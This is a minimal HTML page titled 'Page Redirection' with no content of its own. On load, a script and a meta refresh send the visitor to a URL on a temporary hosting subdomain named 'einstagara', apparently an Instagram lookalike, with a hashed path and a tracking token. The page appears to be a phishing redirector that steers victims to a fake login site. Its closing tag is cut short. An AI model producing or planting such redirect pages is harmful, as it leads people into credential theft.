<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0; url="">

<script>
window.location.href ="http://einstagara.temp.swtest.ru/67200d39b342efca5ee43ba35fea7b68/index.php?orBmiUZH411895576=T9EDB5yUCmr"
</script>

<title>Page Redirection</title>
</head>
<body>

</body>
</html